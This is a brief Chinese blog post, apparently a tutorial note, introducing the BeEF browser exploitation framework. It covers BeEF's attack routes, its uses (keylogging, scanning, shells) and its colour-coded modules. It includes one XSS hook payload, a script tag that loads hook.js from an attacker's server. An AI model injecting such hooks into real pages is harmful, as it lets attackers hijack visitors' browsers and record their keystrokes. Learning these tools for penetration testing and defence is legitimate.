XSS漏洞 BEEF工具的使用
日期: 2018-09-23 分类: 个人收藏 370次阅读
目录
BEEF简介
1、Beef
- 生成、交付 paylaod
- Ruby 语言编写
- 服务器端:管理 hooked 客户端
- 客户端:运行与客户端浏览器的 Javascript 脚本(hook)
2、攻击手段
- 利用往回走哪 xss 漏洞实现攻击
- 诱使客户端访问含有 hook 的伪造站点
- 结合中间人攻击注入 hook 脚本
3、常见用途
- 键盘记录器
- 网络扫描
- 浏览器信息收集
- 绑定 shell
- 与 metasploit 集成
使用
1、启动beef
2、上传脚本
Hook: <script src="http://<IP>:3000/hook.js"></script>
3、beef管理
1、键盘记录记录在log模块
2、命令模块
绿色模块:表示模块适合目标浏览器,并且执行结果对客户端不可见
红色模块:表示模块不适用与当前用户,有些红色模块也可以正常执行
橙色模块:模块可用,但结果对用户可见(CAM 弹窗申请权限)
灰色模块:模块未在目标浏览器上测试过
主要模块
-Browsers
- Exploits
- Host
- Persistence(持久)
- Network
除特别声明,本站所有文章均为原创,如需转载请以超级链接形式注明出处:SmartCat's Blog
标签:web 渗透
精华推荐